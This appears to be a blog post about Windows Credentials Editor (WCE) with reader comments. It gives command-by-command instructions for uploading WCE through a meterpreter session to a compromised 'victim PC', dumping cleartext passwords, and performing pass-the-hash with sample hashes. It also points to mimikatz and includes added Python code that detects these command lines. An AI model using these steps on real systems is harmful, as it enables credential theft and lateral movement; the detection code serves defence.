Windows Credentials Editor (WCE) is a security tool that lists Windows logon sessions and lets you add, change, list and delete the associated credentials (e.g. LM/NT hashes, Kerberos tickets and cleartext passwords).
The tool allows users to:
- Perform Pass-the-Hash on Windows
- 'Steal' NTLM credentials from memory (with and without code injection)
- 'Steal' Kerberos Tickets from Windows machines
- Use the 'stolen' Kerberos tickets on other Windows or Unix machines to gain access to systems and services
- Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks via penetration testing.
After compromising a remote computer, upload WCE to the victim computer using Metasploit:
(1) Type the following command in the meterpreter session:
upload /pentest/passwords/wce/wce.exe .
(2) Now type shell to get a cmd prompt on the victim PC.
(3) Type wce.exe -w to get the passwords in cleartext.
How to list NTLM credentials in memory?
By default, WCE lists the NTLM credentials in memory; there is no need to specify any options.
For example:
C:\Users\test>wce.exe
How to change my current NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CB6948805F797BF2A82807973B89537
NTLM credentials successfully changed!
How to create a new logon session and launch a program with new NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe
How to generate NTLM hashes with WCE?
wce.exe -g <cleartext password>
For example:
C:\Users\test>wce.exe -g mypassword
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Password: mypassword
Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7
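A detection-side view of the command lines shown above, as an added example (not part of the original post or of WCE): this Python code flags process-creation command lines that carry the -s <username>:<domain>:<lmhash>:<nthash> argument or run wce.exe -w. The sample command lines are constructed, and the classify function and its finding names are hypothetical.

```python
import re

# -s <username>:<domain>:<lmhash>:<nthash>, the argument format shown on this page.
CRED_ARG = re.compile(
    r"(?<!\S)-s\s+(?P<user>[^\s:]+):(?P<domain>[^\s:]+):"
    r"(?P<lm>[0-9A-Fa-f]{32}):(?P<nt>[0-9A-Fa-f]{32})(?!\S)"
)
LAUNCH_ARG = re.compile(r"(?<!\S)-c\s+(?P<program>\S+)")   # -c <program>
CLEARTEXT_FLAG = re.compile(r"(?<!\S)-w(?!\S)")            # wce.exe -w
WCE_IMAGE = re.compile(r'(?:^|[\\/\s"])wce\.exe\b', re.IGNORECASE)


def classify(cmdline):
    """Return (finding, detail) tuples for one process command line.

    Finding names are hypothetical labels chosen for this example.
    """
    findings = []
    cred = CRED_ARG.search(cmdline)
    if cred:
        # Matched on argument shape, so the image name does not matter.
        # Record the account named in the argument, never the hash values.
        detail = {"user": cred["user"], "domain": cred["domain"]}
        launch = LAUNCH_ARG.search(cmdline)
        if launch:
            detail["program"] = launch["program"]
        findings.append(("ntlm-hash-on-command-line", detail))
    if WCE_IMAGE.search(cmdline):
        if CLEARTEXT_FLAG.search(cmdline):
            findings.append(("wce-cleartext-dump", {}))
        elif not cred:
            findings.append(("wce-execution", {}))
    return findings


# Constructed sample command lines; the hashes are the ones printed on this page.
PAGE_HASHES = "01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537"
SAMPLES = [
    "wce.exe -s testuser:amplialabs:" + PAGE_HASHES + " -c cmd.exe",
    r"C:\Windows\Temp\svc.exe -s testuser:amplialabs:" + PAGE_HASHES,
    "wce.exe -w",
    "wce.exe -g mypassword",
    "ping -w 1000 10.0.0.5",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line.replace(PAGE_HASHES, "<lm>:<nt>"))
```

Command-line matching only works where process-creation auditing records the full command line, so it complements rather than replaces monitoring of access to LSASS memory.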
If you want to know more about how it works, download the PDF files below.
(1) PDF 1
(2) PDF 2
If you only need the cleartext passwords, and not logon sessions or anything else, you can use mimikatz to get them.
2 comments:
amazing but i want 2 know more!!!
Thank you, you can download the PDF files which are listed at the end of the article. @Sanju kutty